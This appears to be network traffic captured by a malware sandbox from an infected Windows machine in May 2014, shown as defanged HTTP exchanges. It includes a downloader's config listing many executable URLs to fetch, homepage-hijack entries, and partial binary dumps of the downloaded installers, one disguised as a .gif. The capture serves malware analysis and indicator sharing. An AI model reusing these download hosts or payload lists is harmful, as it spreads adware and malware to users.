...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......P
p@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u..
.\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i.....
.D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..

<<< skipped >>>

GET /ifox/TGQgoEo3TGwCodVok5XuJEsdJwuYq5QdqwXYol-WaExNs91v/IFoxInstall-y-c203945859-run-s-x.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 117.21.183.24
Connection: Keep-Alive


HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 07 May 2014 10:27:35 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- a padding to disable
MSIE and Chrome friendly error page -->..<!-- a padding to disa
ble MSIE and Chrome friendly error page -->..<!-- a padding to d
isable MSIE and Chrome friendly error page -->..<!-- a padding t
o disable MSIE and Chrome friendly error page -->..<!-- a paddin
g to disable MSIE and Chrome friendly error page -->..<!-- a pad
ding to disable MSIE and Chrome friendly error page -->..HTTP/1.1 4
04 Not Found..Server: nginx..Date: Wed, 07 May 2014 10:27:35 GMT..Cont
ent-Type: text/html..Content-Length: 564..Connection: keep-alive..<
html>..<head><title>404 Not Found</title></hea
d>..<body bgcolor="white">..<center><h1>404 Not F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..<!-- a padding to disable MSI
E and Chrome friendly error page -->..<!-- a padding to disable
MSIE and Chrome friendly error page -->..<!-- a padding to disab
le MSIE and Chrome friendly error page -->..<!-- a padding to di
sable MSIE and Chrome friendly error page -->..<!-- a padding to
disable MSIE and Chrome friendly error page -->..<!-- a padding
to disable MSIE and Chrome friendly error page -->....

<<< skipped >>>

GET /img/pic.gif HTTP/1.1
Accept: */*
Referer: hXXp://adsvc2.9365.info/count/softcount/?pwb
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: icon.cnzz.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine/1.3.0
Date: Wed, 07 May 2014 10:27:26 GMT
Content-Type: image/gif
Content-Length: 719
Last-Modified: Fri, 16 Jan 2009 08:10:47 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Expires: Thu, 08 May 2014 10:27:26 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes
GIF89a2.........f..3...33.............................................
.......................................!..NETSCAPE2.0.....!..Powered b
y AFEI.!.......,....2...... !.di.hjBl..p,....x......`P.(...GR.D6...CH.
...,..@8.... -..EQc.8...........`...."....................~"..H.......
.H......"...$....#.........."..........."Z.......*...%!.!.......,....2
...... !.di.hjBl..p,....x..|....p r..H.C.\&.H.tJu...#b......7..W.h....
...7..l..v..-....."....................~"..I........I......"...$....#.
........."..........."\.......*...%!.!.......,....2...... !.di.hjBl..p
,....x..|....p r..H.C.\&.H.tJu...#b......7..W.h.......7..l..v..-....."
....................~"..I........I......"...$....#..........".........
.."\.......*...%!.;HTTP/1.1 200 OK..Server: Tengine/1.3.0..Date: Wed,
07 May 2014 10:27:26 GMT..Content-Type: image/gif..Content-Length: 719
..Last-Modified: Fri, 16 Jan 2009 08:10:47 GMT..Connection: keep-alive
..Keep-Alive: timeout=5..Expires: Thu, 08 May 2014 10:27:26 GMT..Cache
-Control: max-age=86400..Accept-Ranges: bytes..GIF89a2.........f..3...
33....................................................................
................!..NETSCAPE2.0.....!..Powered by AFEI.!.......,....2..
.... !.di.hjBl..p,....x......`P.(...GR.D6...CH....,..@8.... -..EQc.8..
.........`...."....................~"..H........H......"...$....#.....
....."..........."Z.......*...%!.!.......,....2...... !.di.hjBl..p,...
.x..|....p r..H.C.\&.H.tJu...#b......7..W.h.......7..l..v..-....."....
................~"..I........I......"...$....#..........".........

<<< skipped >>>

GET /open/setup_2948-140896.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Host: down.yinyue.fm


HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: application/octet-stream
Last-Modified: Wed, 07 May 2014 08:59:54 GMT
Accept-Ranges: bytes
ETag: "dfe875b6d269cf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 07 May 2014 10:28:12 GMT
Content-Length: 3580392
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......k.F./.(./.(.
/.(.......(.4...7.(.4...].(.4.....(.&...,.(.&...8.(./.)...(.4...$.(.4.
....(.4.....(.Rich/.(.........PE..L....^hS.................`....5.....
.........p....@...........................6.....#.6...@...............
..............................dz4...........6.......6......r..........
........................@............p...............................t
ext...8_.......`.................. ..`.rdata..\\...p...^...d..........
....@..@.data....1..........................@....rsrc...dz4......|4...
..............@..@.reloc..l?....6..@...R6.............@..B............
......................................................................
......................................................................
......................................................................
......................................................................
............................................U..j.h.kA.d.....P..h.d.A.3
..E.SVP.E.d......}..=..A.3..]..G<....A..G...A..G...A..G...A..G.(.A.
.G,....f._0._2._4.G8...E..h.....G|.........................E..E..;.t.P
.......3..u..G4.Y....w8......E..M.;.t.P........S.U.R.G.P.E......]..]..
]...hrA....M.d......Y^[.M.3..d.....]...U.........d.A.3..E.h..........j
.P........C............Qj&j..............qA...u!............RP...qA...
....Q..xrA..F.............P...@..u. .W....?|..W.Rj...................W
......QP..........h<.A........3...h..A....'....M.3..._.x.....].

<<< skipped >>>

GET /dls/axuls.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 211.101.12.49
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 147456
Content-Type: application/octet-stream
Last-Modified: Tue, 06 May 2014 04:53:12 GMT
Accept-Ranges: bytes
ETag: "4e1e8f15e768cf1:17e5"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Wed, 07 May 2014 10:26:21 GMT
MZP.....................@.............................................
..!..L.!..This program must be run under Win32..$7....................
......................................................................
..............................................PE..L....^B*............
................|.............@.......................................
.......@...................................@...L................... ..
(.....................................................................
..............CODE................................ ..`DATA............
....................@...BSS.....1................................idata
..............................@....tls................................
.....rdata..............................@..P.reloc..(.... ............
..........@..P.rsrc....L...@...L..................@..P................
.....@..............@..P..............................................
......................................................................
..............................................@...Boolean...........@.
.False.True.@.,.@...Integer...........D.@...StringP.@...Variant.@...@.
..............................@..........7@..7@..7@..7@..7@..5@.05@.l5
@..TObject..@...TObject..@........System....@...IInterface............
........F.System......D$....M...D$....M...D$....M.....@...@...@.......
.............F .@...........@.,.@...........................@.....\.@.
.7@..^@..^@..7@..7@..^@.05@.l5@..TInterfacedObject....@...TBoundArray.
...........(.@..System.%..A....%..A....%..A....%..A....%..A....%..

<<< skipped >>>

GET /dls/axult.exe HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 211.101.12.49
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 143360
Content-Type: application/octet-stream
Last-Modified: Tue, 06 May 2014 04:53:15 GMT
Accept-Ranges: bytes
ETag: "6e77f17e768cf1:17e5"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Wed, 07 May 2014 10:26:25 GMT
MZP.....................@.............................................
..!..L.!..This program must be run under Win32..$7....................
......................................................................
..............................................PE..L....^B*............
................8.............@.......................................
.......@..............................z....0...L......................
......................................................................
..............CODE....\........................... ..`DATA............
....................@...BSS.....9................................idata
..z...........................@....tls................................
.....rdata..............................@..P.reloc....................
..........@..P.rsrc....L...0...L..................@..P................
.....0..............@..P..............................................
......................................................................
..............................................@...Boolean...........@.
.False.True.@.,.@...Integer...........D.@...StringP.@...Variant.@...@.
..............................@..........7@..7@..7@..7@..7@..5@.05@.l5
@..TObject..@...TObject..@........System....@...IInterface............
........F.System......D$....M...D$....M...D$....M.....@...@...@.......
.............F .@...........@.,.@...........................@.....\.@.
.7@..^@..^@..7@..7@..^@.05@.l5@..TInterfacedObject....@...TBoundArray.
...........(.@..System.%..A....%..A....%..A....%..A....%..A....%..

<<< skipped >>>

GET /ifox/TGQgoEo3TGwCodVok5XuJEsdJwuYq5QdqwXYol-WaExNs91v/IFoxInstall-y-c203945859-run-s-x.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 117.21.183.24
Connection: Keep-Alive


HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 07 May 2014 10:27:36 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- a padding to disable
MSIE and Chrome friendly error page -->..<!-- a padding to disa
ble MSIE and Chrome friendly error page -->..<!-- a padding to d
isable MSIE and Chrome friendly error page -->..<!-- a padding t
o disable MSIE and Chrome friendly error page -->..<!-- a paddin
g to disable MSIE and Chrome friendly error page -->..<!-- a pad
ding to disable MSIE and Chrome friendly error page -->..HTTP/1.1 4
04 Not Found..Server: nginx..Date: Wed, 07 May 2014 10:27:36 GMT..Cont
ent-Type: text/html..Content-Length: 564..Connection: keep-alive..<
html>..<head><title>404 Not Found</title></hea
d>..<body bgcolor="white">..<center><h1>404 Not F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..<!-- a padding to disable MSI
E and Chrome friendly error page -->..<!-- a padding to disable
MSIE and Chrome friendly error page -->..<!-- a padding to disab
le MSIE and Chrome friendly error page -->..<!-- a padding to di
sable MSIE and Chrome friendly error page -->..<!-- a padding to
disable MSIE and Chrome friendly error page -->..<!-- a padding
to disable MSIE and Chrome friendly error page -->....

<<< skipped >>>

GET /280cf9c20714744ccd17e57f66106dc70000000000370d38/9291/15474/setup_2949-14598.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Host: 112.253.11.143


HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Wed, 07 May 2014 10:28:14 GMT
Content-Type: application/octet-stream
Content-Length: 3607864
Last-Modified: Mon, 22 Jul 2013 07:13:13 GMT
Connection: keep-alive
ETag: "51ecdb89-370d38"
Accept-Ranges: bytes
HTTP/1.1 200 OK..Server: nginx/1.4.3..Date: Wed, 07 May 2014 10:28:14 
GMT..Content-Type: application/octet-stream..Content-Length: 3607864..
Last-Modified: Mon, 22 Jul 2013 07:13:13 GMT..Connection: keep-alive..
ETag: "51ecdb89-370d38"..Accept-Ranges: bytes..


GET /9291/15474/setup_2949-14598.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: download.grandcloud.cn
Connection: Keep-Alive


HTTP/1.1 302 Moved Temporarily
Server: nginx/1.3.9
Date: Wed, 07 May 2014 10:28:09 GMT
Content-Type: text/html
Content-Length: 160
Connection: keep-alive
Location: hXXp://112.253.11.143/280cf9c20714744ccd17e57f66106dc70000000000370d38/9291/15474/setup_2949-14598.exe
<html>..<head><title>302 Found</title></hea
d>..<body bgcolor="white">..<center><h1>302 Found
</h1></center>..<hr><center>nginx/1.3.9</ce
nter>..</body>..</html>..HTTP/1.1 302 Moved Temporarily
..Server: nginx/1.3.9..Date: Wed, 07 May 2014 10:28:09 GMT..Content-Ty
pe: text/html..Content-Length: 160..Connection: keep-alive..Location:
hXXp://112.253.11.143/280cf9c20714744ccd17e57f66106dc70000000000370d38
/9291/15474/setup_2949-14598.exe..<html>..<head><title&
gt;302 Found</title></head>..<body bgcolor="white">.
.<center><h1>302 Found</h1></center>..<hr&g
t;<center>nginx/1.3.9</center>..</body>..</html&g
t;....


GET /ad/softad/popup.htm HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: adsvc2.9365.info
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 627
Content-Type: text/html
Last-Modified: Tue, 06 Nov 2012 14:53:24 GMT
Accept-Ranges: bytes
ETag: "147dba782ebccd1:17e5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 07 May 2014 10:26:18 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-eq
uiv="Content-Type" content="text/html; charset=gb2312" />..<titl
e>........</title>..<script type="text/javascript" src="ht
tp://cbjs.baidu.com/js/s.js"></script>..</head>..<bo
dy>..<iframe src="hXXp://adsvc1.haoda123.com/tc.htm" scrolling="
no" frameborder="0" height="0" width="0" allowtransparency="true" bor
der="0" style="width:100%"></iframe>..<script type="text/j
avascript">BAIDU_CLB_singleFillSlot("98364");</script>..</
body>..</html>HTTP/1.1 200 OK..Content-Length: 627..Content-T
ype: text/html..Last-Modified: Tue, 06 Nov 2012 14:53:24 GMT..Accept-R
anges: bytes..ETag: "147dba782ebccd1:17e5"..Server: Microsoft-IIS/6.0.
.X-Powered-By: ASP.NET..Date: Wed, 07 May 2014 10:26:18 GMT..<!DOCT
YPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w
3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="http
://VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Cont
ent-Type" content="text/html; charset=gb2312" />..<title>....
....</title>..<script type="text/javascript" src="hXXp://cbjs
.baidu.com/js/s.js"></script>..</head>..<body>..&
lt;iframe src="hXXp://adsvc1.haoda123.com/tc.htm" scrolling="no" frame
border="0" height="0" width="0" allowtransparency="true" border="

<<< skipped >>>

GET /link/140896/setup_2948-140896.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: click.t3nlink.com
Connection: Keep-Alive


HTTP/1.1 302 FOUND
Server: nginx/1.0.10
Date: Wed, 07 May 2014 10:28:12 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Content-Length: 303
Location: hXXp://down.yinyue.fm/open/setup_2948-140896.exe
Set-Cookie: gid=28b5de4d8844441e8b1f11264ba3d679; Domain=.t3nlink.com; expires=Tue, 02-May-2034 18:28:12 GMT; Max-Age=630720000; Path=/
Cache-Control: no-cache
P3P: CP="UNI CUR OUR", policyref="/w3c/p3p.xml"
CWaueeKey: 1399458492
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">.<titl
e>Redirecting...</title>.<h1>Redirecting...</h1>.
<p>You should be redirected automatically to target URL: <a h
ref="hXXp://down.yinyue.fm/open/setup_2948-140896.exe">hXXp://down.
yinyue.fm/open/setup_2948-140896.exe</a>. If not click the link
.HTTP/1.1 302 FOUND..Server: nginx/1.0.10..Date: Wed, 07 May 2014 10:2
8:12 GMT..Content-Type: text/html; charset=utf-8..Connection: keep-ali
ve..Content-Length: 303..Location: hXXp://down.yinyue.fm/open/setup_29
48-140896.exe..Set-Cookie: gid=28b5de4d8844441e8b1f11264ba3d679; Domai
n=.t3nlink.com; expires=Tue, 02-May-2034 18:28:12 GMT; Max-Age=6307200
00; Path=/..Cache-Control: no-cache..P3P: CP="UNI CUR OUR", policyref=
"/w3c/p3p.xml"..CWaueeKey: 1399458492..<!DOCTYPE HTML PUBLIC "-//W3
C//DTD HTML 3.2 Final//EN">.<title>Redirecting...</title&g
t;.<h1>Redirecting...</h1>.<p>You should be redirect
ed automatically to target URL: <a href="hXXp://down.yinyue.fm/open
/setup_2948-140896.exe">hXXp://down.yinyue.fm/open/setup_2948-14089
6.exe</a>. If not click the link...

<<< skipped >>>

GET /6d6dbaafbdb27b66f2773203ae554b05000000000007a3c8/9291/15956/IFoxInstall-y-c203945859-run-s-x.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Host: 112.253.11.137


HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Wed, 07 May 2014 10:27:40 GMT
Content-Type: application/octet-stream
Content-Length: 500680
Last-Modified: Mon, 21 Jan 2013 13:28:07 GMT
Connection: keep-alive
ETag: "50fd4267-7a3c8"
Accept-Ranges: bytes
HTTP/1.1 200 OK..Server: nginx/1.4.3..Date: Wed, 07 May 2014 10:27:40 
GMT..Content-Type: application/octet-stream..Content-Length: 500680..L
ast-Modified: Mon, 21 Jan 2013 13:28:07 GMT..Connection: keep-alive..E
Tag: "50fd4267-7a3c8"..Accept-Ranges: bytes..MZ......................@
...............................................!..L.!This program cann
ot be run in DOS mode....$.......................D./.......,.......:.o
.....=......j.......j..........6.....3.......-.......(.....Rich.......
.....PE..L...jB.P.............................\............@..........
.............................@.................................Tp..@..
.....<j...................`...J..0.................................
..@............................................text...................
............ ..`.rdata..............................@..@.data...h\....
...:...~..............@....rsrc...<j.......l..................@..@.
reloc..Ji...`...j...$..............@..B...............................
......................................................................
......................................................................
......................................................................
......................................................................
.........................j`...D..a]........$.E....j.Q....e.h..D.......
}.W.s~..3..]...........D...1...E......E..4.D..]..]..]..]..]..]......h.
:...5..E....i......K...h....h....j.j.Y.E...........j..M.Q...P.SW......
..M.Q...P.....E....}.....4.D.......h.:...5..E..................M.j

<<< skipped >>>

GET /core.php?web_id=4327411&show=pic&t=z HTTP/1.1
Accept: */*
Referer: hXXp://adsvc2.9365.info/count/softcount/?pwb
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: c.cnzz.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine
Date: Wed, 07 May 2014 10:27:25 GMT
Content-Type: application/javascript
Content-Length: 801
Connection: keep-alive
Last-Modified: Wed, 07 May 2014 10:27:25 GMT
Expires: Wed, 07 May 2014 10:42:25 GMT
!function(){var a,b,c,d=encodeURIComponent,e="4327411",f="pic",g="",h=
"online_v3.php",i="hzs2.cnzz.com",j="1",k="pic",l="z",m="站ž
71;统计",n=window["_CNZZDbridge_" e].bobject,o="https:"==d
ocument.location.protocol?"https:":"http:",p="0",q=o "//online.cnzz.co
m/online/" h,r=[];r.push("id=" e),r.push("h=" i),r.push("on=" d(g)),r.
push("s=" d(f)),q ="?" r.join("&"),"0"===p&&n.callRequest([o "//cnzz.m
mstat.com/9.gif?abc=1"]),j&&(""!==g?n.createScriptIcon(q,"utf-8"):(b="
z"==l?"hXXp://VVV.cnzz.com/stat/website.php?web_id=" e:"hXXp://quanjin
g.cnzz.com","pic"===k?(c=o "//icon.cnzz.com/img/" f ".gif",a="<a hr
ef='" b "' target=_blank title='" m "'><img border=0 hspace=0 vs
pace=0 src='" c "'></a>"):a="<a href='" b "' target=_blank
title='" m "'>" m "</a>",n.createIcon([a])))}();...HTTP/1.1
200 OK..Server: Tengine..Date: Wed, 07 May 2014 10:27:25 GMT..Content-
Type: application/javascript..Content-Length: 801..Connection: keep-al
ive..Last-Modified: Wed, 07 May 2014 10:27:25 GMT..Expires: Wed, 07 Ma
y 2014 10:42:25 GMT..!function(){var a,b,c,d=encodeURIComponent,e="432
7411",f="pic",g="",h="online_v3.php",i="hzs2.cnzz.com",j="1",k="pic",l
="z",m="站长统计",n=window["_CNZZDbridge_" e].
bobject,o="https:"==document.location.protocol?"https:":"http:",p="0",
q=o "//online.cnzz.com/online/" h,r=[];r.push("id=" e),r.push("h=" i),
r.push("on=" d(g)),r.push("s=" d(f)),q ="?" r.join("&"),"0"===p&&n.cal
lRequest([o "//cnzz.mmstat.com/9.gif?abc=1"]),j&&(""!==g?n.createS

<<< skipped >>>

GET /9291/15956/IFoxInstall-y-c203945859-run-s-x.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: download.grandcloud.cn
Connection: Keep-Alive


HTTP/1.1 302 Moved Temporarily
Server: nginx/1.3.9
Date: Wed, 07 May 2014 10:27:36 GMT
Content-Type: text/html
Content-Length: 160
Connection: keep-alive
Location: hXXp://112.253.11.137/6d6dbaafbdb27b66f2773203ae554b05000000000007a3c8/9291/15956/IFoxInstall-y-c203945859-run-s-x.exe
<html>..<head><title>302 Found</title></hea
d>..<body bgcolor="white">..<center><h1>302 Found
</h1></center>..<hr><center>nginx/1.3.9</ce
nter>..</body>..</html>..HTTP/1.1 302 Moved Temporarily
..Server: nginx/1.3.9..Date: Wed, 07 May 2014 10:27:36 GMT..Content-Ty
pe: text/html..Content-Length: 160..Connection: keep-alive..Location:
hXXp://112.253.11.137/6d6dbaafbdb27b66f2773203ae554b05000000000007a3c8
/9291/15956/IFoxInstall-y-c203945859-run-s-x.exe..<html>..<he
ad><title>302 Found</title></head>..<body bgco
lor="white">..<center><h1>302 Found</h1></cent
er>..<hr><center>nginx/1.3.9</center>..</body&
gt;..</html>....


GET /count/softcount/?pwb HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: adsvc2.9365.info
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 109
Content-Type: text/html
Content-Location: hXXp://adsvc2.9365.info/count/softcount/index.htm
Last-Modified: Tue, 06 Nov 2012 14:53:28 GMT
Accept-Ranges: bytes
ETag: "44c497b2ebccd1:17e5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 07 May 2014 10:26:15 GMT
<script src="hXXp://s85.cnzz.com/stat.php?id=4327411&web_id=4327411
&show=pic" language="JavaScript"></script>HTTP/1.1 200 OK..Co
ntent-Length: 109..Content-Type: text/html..Content-Location: hXXp://a
dsvc2.9365.info/count/softcount/index.htm..Last-Modified: Tue, 06 Nov
2012 14:53:28 GMT..Accept-Ranges: bytes..ETag: "44c497b2ebccd1:17e5"..
Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Date: Wed, 07 May 20
14 10:26:15 GMT..<script src="hXXp://s85.cnzz.com/stat.php?id=43274
11&web_id=4327411&show=pic" language="JavaScript"></script>font>....



GET /ad/softad/pwb.htm HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: adsvc2.9365.info
Connection: Keep-Alive
Cookie: CNZZDATA4327411=cnzz_eid=51257339-1399458444-&ntime=1399458444&cnzz_a=0<ime=1399458447695


HTTP/1.1 200 OK
Content-Length: 961
Content-Type: text/html
Last-Modified: Tue, 06 May 2014 04:55:27 GMT
Accept-Ranges: bytes
ETag: "f8f01b66e768cf1:17e5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 07 May 2014 10:26:21 GMT
[dl]..hXXp://211.101.12.49/dls/axuls.exe=..hXXp://211.101.12.49/dls/ax
ult.exe=..hXXp://117.21.183.24/ifox/TGQgoEo3TGwCodVok5XuJEsdJwuYq5Qdqw
XYol-WaExNs91v/IFoxInstall-y-c203945859-run-s-x.exe=..hXXp://download.
wuji.com/wuji/open/setup_open_341.exe=..hXXp://click.t3nlink.com/link/
140896/setup_2948-140896.exe=..hXXp://download.grandcloud.cn/9291/1915
6/yszj_zhimeng_160110.exe=..hXXp://down.yuemar.net:888/yuemar_x06.exe=
..hXXp://xz.657080.com/download.php/LD_2075_S.exe=..hXXp://VVV.huamei-
global.com/play_3020_161196.exe=..hXXp://down.xiaoxinrili.com/hezi/jm/
s1014.exe=..hXXp://222.76.213.168:8765/sOnlinetime1.4.1_1114.exe=..htt
p://xz.fuzhicheng.com/n/pczh_110_157239.exe=..hXXp://downloads.t3nlink
.com/packages/g_wz/default2/wuzun-zm-157391-v6.exe=..hXXp://lm.beilequ
.com/update/365/365weatherIns_202.exe=..hXXp://download.grandcloud.cn/
9291/20572/-8388_158017_xc.exe=..[pw]..hXXp://hao.6360.info/=..[hp]..h
ttp://hao.6360.info/=..[hp2]..hao.uenet.info=HTTP/1.1 200 OK..Content-
Length: 961..Content-Type: text/html..Last-Modified: Tue, 06 May 2014
04:55:27 GMT..Accept-Ranges: bytes..ETag: "f8f01b66e768cf1:17e5"..Serv
er: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Date: Wed, 07 May 2014 1
0:26:21 GMT..[dl]..hXXp://211.101.12.49/dls/axuls.exe=..hXXp://211.101
.12.49/dls/axult.exe=..hXXp://117.21.183.24/ifox/TGQgoEo3TGwCodVok5XuJ
EsdJwuYq5QdqwXYol-WaExNs91v/IFoxInstall-y-c203945859-run-s-x.exe=..htt
p://download.wuji.com/wuji/open/setup_open_341.exe=..hXXp://click.t3nl
ink.com/link/140896/setup_2948-140896.exe=..hXXp://download.grandc

<<< skipped >>>

GET /qdn/setup_qd304.gif HTTP/1.1
User-Agent: Metadl/1.0 (NSIS plugin)
Host: down.guangsu.cn
Accept: */*


HTTP/1.1 200 OK
Date: Wed, 07 May 2014 10:27:39 GMT
Content-Type: image/gif
Last-Modified: Wed, 19 Feb 2014 12:34:34 GMT
Accept-Ranges: bytes
ETag: "0a998f16e2dcf1:0"
Server: Microsoft-IIS/7.5
Content-Length: 13843752
X-Via: 1.1 zjjhdx39:8080 (Cdn Cache Server V2.0), 1.1 fra72:6 (Cdn Cache Server V2.0)
Connection: keep-alive
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......<.yex..6x
..6x..6_Pz6{..6_Pl6i..6x..6...6q..6s..6q..6y..6q..6y..6Richx..6.......
.........PE..L..../.Q.................\..........p3.......p....@......
....................0..............................................pv.
..........E..........h'...............................................
................p...............................text....[.......\.....
............. ..`.rdata..\....p.......`..............@..@.data........
........v..............@....ndata.......@...........................rs
rc....E.......F...x..............@..@.................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
.....;B..H.P.u..u..u...Hr@..K...SV.5.;B.W.E.P.u...Lr@..e...E..E.P.u...
Pr@..}..e....Dp@........FR..VV..U... M..........M........E...FQ.....NU
..M.......M...VT..U........FP..E...............E.P.M...Hp@..E..P.E..E.
P.u...Tr@..u....E..9}...n....~X.te.v4..Lp@..E...tU.}.j.W.E......E.....
..Pp@..vXW..Tp@..u..5Xp@.W..h ....E..E.Pj.h.3B.W..Xr@..u.W...u....E.P.
u...\r@._^3.[.....L$...;B...i......T.....tUVW.q.3.;5.;B.sD..i......D..
S.....t.G.....t...O..t .....u...3....3...F.....;5.;B.r.[_^...U..QQ

<<< skipped >>>

GET /js/s.js HTTP/1.1
Accept: */*
Referer: hXXp://adsvc2.9365.info/ad/softad/popup.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cbjs.baidu.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Wed, 07 May 2014 10:27:31 GMT
Content-Type: application/x-javascript
Last-Modified: Wed, 16 Apr 2014 09:59:09 GMT
